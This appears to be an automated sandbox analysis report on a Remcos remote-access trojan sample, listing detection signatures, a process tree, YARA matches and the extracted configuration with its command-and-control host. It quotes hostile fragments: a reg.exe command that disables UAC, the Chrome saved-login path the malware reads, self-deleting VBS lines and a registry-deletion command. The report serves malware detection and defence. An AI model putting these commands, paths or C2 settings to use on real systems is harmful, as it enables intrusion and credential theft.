
Windows Analysis Report IQl00lxPjo

Overview

General Information

Sample Name:IQl00lxPjo (renamed file extension from none to exe)
Analysis ID:484282
MD5:9b8ae8edfe553edea6108dceebcc57b8
SHA1:eae4825368e0ed56db5484012303add569cb98e9
SHA256:d79ba47a55b5dcb4cf6e76ac13bd3179e1523d5904483232d9ce9d39915dbc69
Tags:32exe

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Injects a PE file into a foreign process
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionality to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • IQl00lxPjo.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\IQl00lxPjo.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)
    • DpiScaling.exe (PID: 3980 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
    • cmd.exe (PID: 6652 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1844 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5736 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Dsqbhgvf.exe (PID: 4984 cmdline: 'C:\Users\Public\Libraries\Dsqbhgvf.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)
    • dialer.exe (PID: 7080 cmdline: C:\Windows\System32\dialer.exe MD5: F176211F7372248224D02AC023573870)
  • Dsqbhgvf.exe (PID: 5388 cmdline: 'C:\Users\Public\Libraries\Dsqbhgvf.exe' MD5: 9B8AE8EDFE553EDEA6108DCEEBCC57B8)
    • dialer.exe (PID: 4176 cmdline: C:\Windows\System32\dialer.exe MD5: F176211F7372248224D02AC023573870)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\fvghbqsD.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x60f12:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60e8e:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60e8e:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60496:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60aee:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x600ea:$str_b2: Executing file:
  • 0x61056:$str_b3: GetDirectListeningPort
  • 0x608ae:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x60ad6:$str_b7: \update.vbs
  • 0x6013a:$str_b9: Downloaded file:
  • 0x60126:$str_b10: Downloading file:
  • 0x6010e:$str_b12: Failed to upload file:
  • 0x6101e:$str_b13: StartForward
  • 0x6103e:$str_b14: StopForward
  • 0x60a7e:$str_b15: fso.DeleteFile "
  • 0x60a12:$str_b16: On Error Resume Next
  • 0x60aae:$str_b17: fso.DeleteFolder "
  • 0x600fe:$str_b18: Uploaded file:
  • 0x6017a:$str_b19: Unable to delete:
  • 0x60a46:$str_b20: while fso.FileExists("
  • 0x605cf:$str_c0: [Firefox StoredLogins not found]

Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f87c:$str_b2: Executing file:
  • 0x607e8:$str_b3: GetDirectListeningPort
  • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x60268:$str_b7: \update.vbs
  • 0x5f8cc:$str_b9: Downloaded file:
  • 0x5f8b8:$str_b10: Downloading file:
  • 0x5f8a0:$str_b12: Failed to upload file:
  • 0x607b0:$str_b13: StartForward
  • 0x607d0:$str_b14: StopForward
  • 0x60210:$str_b15: fso.DeleteFile "
  • 0x601a4:$str_b16: On Error Resume Next
  • 0x60240:$str_b17: fso.DeleteFolder "
  • 0x5f890:$str_b18: Uploaded file:
  • 0x5f90c:$str_b19: Unable to delete:
  • 0x601d8:$str_b20: while fso.FileExists("
  • 0x5fd61:$str_c0: [Firefox StoredLogins not found]

Source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Unpacked PEs

Source: 7.2.DpiScaling.exe.400000.0.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 7.2.DpiScaling.exe.400000.0.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5e67c:$str_b2: Executing file:
  • 0x5f5e8:$str_b3: GetDirectListeningPort
  • 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x5f068:$str_b7: \update.vbs
  • 0x5e6cc:$str_b9: Downloaded file:
  • 0x5e6b8:$str_b10: Downloading file:
  • 0x5e6a0:$str_b12: Failed to upload file:
  • 0x5f5b0:$str_b13: StartForward
  • 0x5f5d0:$str_b14: StopForward
  • 0x5f010:$str_b15: fso.DeleteFile "
  • 0x5efa4:$str_b16: On Error Resume Next
  • 0x5f040:$str_b17: fso.DeleteFolder "
  • 0x5e690:$str_b18: Uploaded file:
  • 0x5e70c:$str_b19: Unable to delete:
  • 0x5efd8:$str_b20: while fso.FileExists("
  • 0x5eb61:$str_c0: [Firefox StoredLogins not found]

Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5e67c:$str_b2: Executing file:
  • 0x5f5e8:$str_b3: GetDirectListeningPort
  • 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x5f068:$str_b7: \update.vbs
  • 0x5e6cc:$str_b9: Downloaded file:
  • 0x5e6b8:$str_b10: Downloading file:
  • 0x5e6a0:$str_b12: Failed to upload file:
  • 0x5f5b0:$str_b13: StartForward
  • 0x5f5d0:$str_b14: StopForward
  • 0x5f010:$str_b15: fso.DeleteFile "
  • 0x5efa4:$str_b16: On Error Resume Next
  • 0x5f040:$str_b17: fso.DeleteFolder "
  • 0x5e690:$str_b18: Uploaded file:
  • 0x5e70c:$str_b19: Unable to delete:
  • 0x5efd8:$str_b20: while fso.FileExists("
  • 0x5eb61:$str_c0: [Firefox StoredLogins not found]

Source: 7.2.DpiScaling.exe.10591a6e.2.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack; Malware Configuration Extractor: Remcos (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: IQl00lxPjo.exe; Virustotal: Detection: 31%
Yara detected Remcos RAT
Source: Yara match; File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: twistednerd.dvrlists.com; Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Virustotal: Detection: 31%
Source: 7.0.DpiScaling.exe.10590000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.DpiScaling.exe.10590000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.DpiScaling.exe.10590000.1.unpack; Avira: Label: TR/Dropper.Gen
Source: 7.0.DpiScaling.exe.10590000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.DpiScaling.exe.10590000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105BF438 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: DpiScaling.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: IQl00lxPjo.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004061C3 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00446AF9 FindFirstFileExA
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_10597031 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_1059B09B FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105A85C2 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_1059AE80 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: twistednerd.dvrlists.com
Source: Joe Sandbox View; ASN Name: ALTUSNL ALTUSNL
Source: global traffic; TCP traffic: 192.168.2.4:49768 -> 31.3.152.100:8618
Source: unknown; DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00422251 recv

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_10599700 SetWindowsHookExA 0000000D,0040887B,00000000
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00409BD9 OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004089BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match; File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105A8D7E SystemParametersInfoW

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
Source: IQl00lxPjo.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda), matched in the following sources:
  • 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
  • 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
  • 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
  • 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
  • 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
  • 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
  • 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\Public\Libraries\fvghbqsD.url, type: DROPPED; Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers (author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019)
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00412BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004340D5
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00423098
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00411205
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043820B
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004223C0
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044D3FA
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043843A
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043450A
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00419521
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044B5AB
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00431670
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042E6D5
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004516E0
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004337C1
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004228B7
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043493F
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043FA50
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0041AAA0
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00430BBE
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044BCC9
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00433CBD
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00422F55
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00437FDC
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105910CA
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105B322E
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105AA38F
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105C24DE
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105BF543
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105C462F
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105B3725
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105AB90E
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105B3DC3
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105B3F06
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: String function: 0042F49E appears 37 times
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: String function: 00402084 appears 78 times
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: String function: 0042FB60 appears 53 times
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Code function: String function: 022FF847 appears 35 times
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105A4F99 CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess
Source: IQl00lxPjo.exe; Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: IQl00lxPjo.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dsqbhgvf.exe.0.dr; Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dsqbhgvf.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: IQl00lxPjo.exe; Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\IQl00lxPjo.exe; File read: C:\Users\user\Desktop\IQl00lxPjo.exe
Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\IQl00lxPjo.exe 'C:\Users\user\Desktop\IQl00lxPjo.exe'
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Dsqbhgvf.exe 'C:\Users\Public\Libraries\Dsqbhgvf.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Dsqbhgvf.exe 'C:\Users\Public\Libraries\Dsqbhgvf.exe'
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
